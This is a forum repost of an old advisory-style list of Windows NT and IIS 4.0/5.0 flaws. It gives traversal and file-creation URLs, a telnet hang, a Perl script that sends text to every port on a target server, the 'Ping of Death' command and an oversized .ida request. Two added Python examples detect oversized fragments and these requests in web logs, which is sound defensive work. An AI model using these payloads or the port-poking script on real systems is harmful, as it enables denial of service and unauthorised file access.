
汶上信息港

Title: NT vulnerabilities and descriptions (English)

Author: 雜七雜八    Time: 2011-1-13 17:12
Title: NT vulnerabilities and descriptions (English)
Affected systems: 4.0, IIS 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------
Affected systems: 4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------
Affected systems: 3.51, 4.0
Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script, gleaned from postings on the NTsecurity@iss.net list, to test the ports on your system (Perl is available from the NT Resource Kit):

# begin poke code

use strict;
use warnings;
use IO::Socket::INET;   # replaces the old chat2.pl library, which modern Perl does not ship

my $systemname = shift @ARGV or die "usage: perl poke servername\n";

my $verbose    = 1; # tell me what you're hitting
my $knownports = 1; # don't hit known problem ports (53, 135, 1031)

for (my $port = 1; $port < 65535; $port++) {
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    if ($verbose) {
        print "Trying port: $port\n";
    }
    # open a TCP connection; ports that refuse or time out are simply skipped
    my $fh = IO::Socket::INET->new(
        PeerAddr => $systemname,
        PeerPort => $port,
        Proto    => 'tcp',
        Timeout  => 2,
    ) or next;
    print $fh "This is about ten characters or more\n";
    close($fh);
}

# end poke code

Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------
Affected systems: 4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------
Affected systems: 3.51, 4.0
Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.

--------------------------------------------------------------------------------
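The 'Ping of Death' entry above works because 65527 bytes of ping data plus the 8-byte ICMP header give 65535 bytes of IP payload, which is 65555 bytes once the 20-byte IP header is added, more than the 16-bit IPv4 total-length field can describe, and more than a reassembly buffer sized for 65535 bytes. A border device or IDS that tracks fragment offsets can reject such a datagram before the host ever reassembles it. The following is an added example, not code from the original post: it parses constructed IPv4 fragments, tracks the highest data offset seen per (src, dst, id, protocol) and flags any datagram whose reassembled size would exceed 65535 bytes. The function names and the constructed packets are mine, and a 20-byte header without options is assumed for the reassembled datagram.

```python
import struct
from collections import defaultdict

IPV4_MAX_DATAGRAM = 65535   # largest size the 16-bit IPv4 total-length field can express
IPV4_HEADER_LEN = 20        # assumed header length of the reassembled datagram (no options)


def make_fragment(ident, offset_units, payload_len, more_fragments,
                  src=b"\x0a\x00\x00\x01", dst=b"\x0a\x00\x00\x02", proto=1):
    """Constructed IPv4 fragment: a 20-byte header plus a zero-filled payload.
    offset_units is the fragment offset in 8-byte units, as carried on the wire."""
    flags_frag = (0x2000 if more_fragments else 0) | (offset_units & 0x1FFF)
    header = struct.pack("!BBHHHBBH4s4s",
                         0x45,                           # version 4, IHL 5 (20 bytes)
                         0,                              # TOS
                         IPV4_HEADER_LEN + payload_len,  # total length of this fragment
                         ident, flags_frag,
                         64,                             # TTL
                         proto,                          # 1 = ICMP
                         0,                              # checksum left zero for the demo
                         src, dst)
    return header + b"\x00" * payload_len


def parse_fragment(packet):
    """Return the reassembly key, data offset (bytes), data length and MF flag of one packet."""
    (ver_ihl, _tos, total_len, ident, flags_frag, _ttl, proto,
     _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    ihl = (ver_ihl & 0x0F) * 4
    offset = (flags_frag & 0x1FFF) * 8
    more = bool(flags_frag & 0x2000)
    return (src, dst, ident, proto), offset, total_len - ihl, more


def find_oversized(packets):
    """Return {reassembly_key: reassembled_size} for every datagram whose fragments,
    put back together behind a 20-byte header, would exceed 65535 bytes."""
    data_end = defaultdict(int)
    for pkt in packets:
        key, offset, length, _more = parse_fragment(pkt)
        data_end[key] = max(data_end[key], offset + length)
    return {key: IPV4_HEADER_LEN + end
            for key, end in data_end.items()
            if IPV4_HEADER_LEN + end > IPV4_MAX_DATAGRAM}


# Constructed traffic: datagram id 1 mimics "ping -l 65527" (8-byte ICMP header + 65527 bytes
# of data = 65535 bytes of IP payload, 65555 bytes with the IP header); datagram id 2 is the
# largest legal size, 65535 bytes in total, and must not be flagged.
PING_OF_DEATH = [make_fragment(1, 0, 1480, True),
                 make_fragment(1, 8189, 23, False)]     # 8189*8 + 23 = 65535 bytes of data
LEGAL_MAX = [make_fragment(2, 0, 1480, True),
             make_fragment(2, 8180, 75, False)]         # 8180*8 + 75 = 65515 bytes of data

if __name__ == "__main__":
    for key, size in find_oversized(PING_OF_DEATH + LEGAL_MAX).items():
        print(f"oversized reassembly: id={key[2]} proto={key[3]} would be {size} bytes")
```

The check is deliberately done on offsets rather than by buffering fragments, so a filter can drop the offending last fragment without holding the whole datagram in memory; the same rule catches the oversized reassembly whatever the fragment order on the wire.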
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0).

When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida the server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive) by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found'. Such a response allows them to gain further knowledge of how the web site is organized and of the directory structure of the server.
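Several of the entries in this post leave the same kind of trace in a web server log: the '..\..' traversal and 'scripts..\..\scriptname' requests of the first entry, the '>PATH\target.bat' and '%0A%0D' redirection requests of the second, the "GET ../.." crash, the oversized ".ida" URL, and the '.ida'/'.idq' requests for files that do not exist. The following is an added example, not code from the original post, of a log scan that would surface all of them for review. It percent-decodes each request before matching (so %0A%0D is seen as the server saw it), treats '\' as a path separator the way IIS does, and uses status 404 plus an '.ida'/'.idq' extension as the signature of the path-disclosure probe. The W3C-style column layout of the sample lines, the 1024-byte length threshold, the sample log itself and the function names are all my assumptions; the log lines are constructed, not real traffic.

```python
import re
from urllib.parse import unquote

LONG_URL_THRESHOLD = 1024   # assumed cutoff; the .ida crash described needs a ~25 KB path
IDA_IDQ = re.compile(r"\.id[aq](\?|$)", re.IGNORECASE)


def classify_request(uri, status):
    """Return the reasons a single logged request deserves review; empty if none.
    The URI is percent-decoded first so %0A%0D and friends look as they did to the server."""
    decoded = unquote(uri)
    normalised = decoded.replace("\\", "/")          # IIS accepts '\' as a path separator too
    reasons = []
    if "../" in normalised:
        reasons.append("path traversal")
    if ">" in decoded:
        reasons.append("output redirection in path")
    if "\r" in decoded or "\n" in decoded:
        reasons.append("encoded CR/LF in path")
    if IDA_IDQ.search(normalised):
        if len(decoded) > LONG_URL_THRESHOLD:
            reasons.append("oversized .ida/.idq request")
        elif status == 404:
            reasons.append(".ida/.idq request for a missing file (path disclosure probe)")
    return reasons


def scan_log(lines):
    """Run classify_request over W3C-style lines: date time c-ip method uri-stem uri-query status.
    Returns [(line_number, reasons)] for every line that matched at least one rule."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 7:
            continue                                  # skip comments and malformed lines
        uri, status = fields[4], int(fields[6])
        reasons = classify_request(uri, status)
        if reasons:
            findings.append((lineno, reasons))
    return findings


# Constructed sample log (not real traffic): a benign request, then one request of each
# shape described in the post, then another benign request.
SAMPLE_LOG = [
    "2011-01-13 17:12:01 10.0.0.5 GET /index.html - 200",
    "2011-01-13 17:12:02 10.0.0.5 GET /..\\.. - 200",
    "2011-01-13 17:12:03 10.0.0.5 GET /scripts/exploit.bat>target.bat - 200",
    "2011-01-13 17:12:04 10.0.0.5 GET /scripts/script_name%0A%0D>target.bat - 200",
    "2011-01-13 17:12:05 10.0.0.5 GET /" + "." * 3000 + "ida - 500",
    "2011-01-13 17:12:06 10.0.0.5 GET /anything.idq - 404",
    "2011-01-13 17:12:07 10.0.0.5 GET /products/list.asp id=3 200",
]

if __name__ == "__main__":
    for lineno, reasons in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(reasons)}")
```

Decoding before matching is the part that matters: a rule written against the raw log field would see '%0A%0D' and '%5C' as harmless text, while the server had already turned them into a line break and a backslash. The 404 condition keeps ordinary Index Server traffic out of the findings and isolates the requests for files that do not exist, which are the ones that produce the 'could not be found' message quoted above.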




Welcome to 汶上信息港 (http://www.vancelump.com/) Powered by Discuz! X3.5